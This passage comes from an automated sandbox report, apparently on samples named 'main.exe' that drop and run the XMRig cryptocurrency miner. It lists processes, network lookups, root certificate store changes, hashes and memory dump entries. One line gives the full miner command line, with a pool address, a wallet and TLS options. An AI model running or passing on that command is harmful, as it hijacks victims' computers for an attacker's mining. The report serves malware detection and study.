memory/2192-54-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-55-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-56-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-57-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-58-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-59-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-60-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-61-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-62-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-63-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-64-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-65-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-66-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-67-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-68-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-69-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-70-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-71-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-72-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-73-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-74-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-75-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-76-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-77-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-78-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-79-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-80-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-81-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-82-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 14:29
Platform
win10v2004-20240508-en
Max time kernel
1790s
Max time network
1801s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3840,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4764 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:13
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1799s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4500,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4344,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4360 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:13
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 964 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 964 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.141.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4008-14-0x0000020F2A720000-0x0000020F2A740000-memory.dmp
memory/4008-15-0x0000020F2A770000-0x0000020F2A790000-memory.dmp
memory/4008-16-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-18-0x0000020F2C060000-0x0000020F2C080000-memory.dmp
memory/4008-17-0x0000020F2A790000-0x0000020F2A7B0000-memory.dmp
memory/4008-19-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-20-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-23-0x0000020F2C060000-0x0000020F2C080000-memory.dmp
memory/4008-22-0x0000020F2A790000-0x0000020F2A7B0000-memory.dmp
memory/4008-21-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-24-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-25-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-26-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-27-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-28-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-29-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-30-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-31-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-32-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-33-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-34-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-35-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-36-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-37-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-38-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-39-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-40-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-41-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-42-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-43-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-44-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-45-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-46-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-47-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-48-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-49-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-50-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-51-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-52-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-53-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-54-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-55-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-56-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-57-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-58-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-59-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-60-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-61-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-62-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-63-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-64-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-65-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-66-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-67-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-68-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-69-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-70-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-71-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-72-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-73-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-74-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-75-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-76-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-77-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-78-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-79-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-80-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-81-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-82-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | 